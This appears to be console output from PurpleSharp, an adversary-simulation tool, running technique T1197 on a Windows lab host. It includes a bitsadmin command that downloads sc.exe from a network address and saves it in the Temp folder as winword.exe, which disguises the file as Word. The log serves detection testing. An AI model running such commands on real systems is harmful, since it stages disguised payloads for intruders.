c:\Tools\PurpleSharp-master\PurpleSharp\bin\Debug>PurpleSharp.exe /t T1197
11/07/2020 18:18:38 [*]  Starting T1197 Simulation on MSEDGEWIN10
11/07/2020 18:18:38 [*]  Simulator running from c:\Tools\PurpleSharp-master\PurpleSharp\bin\Debug\PurpleSharp.exe with PID:688 as MSEDGEWIN10\IEUser
11/07/2020 18:18:38 [*]  Executing Command: bitsadmin /transfer job /download /priority high http://192.168.114.198:8000/sc.exe C:\Windows\Temp\winword.exe
11/07/2020 18:18:38 [*]  Process successfully created. (PID): 10048
11/07/2020 18:18:38 [*]  Simulation Finished
11/07/2020 18:18:38 [*]  Playbook Finished

BITSADMIN version 3.0
BITS administration utility.
(C) Copyright Microsoft Corp.

Transfer complete.

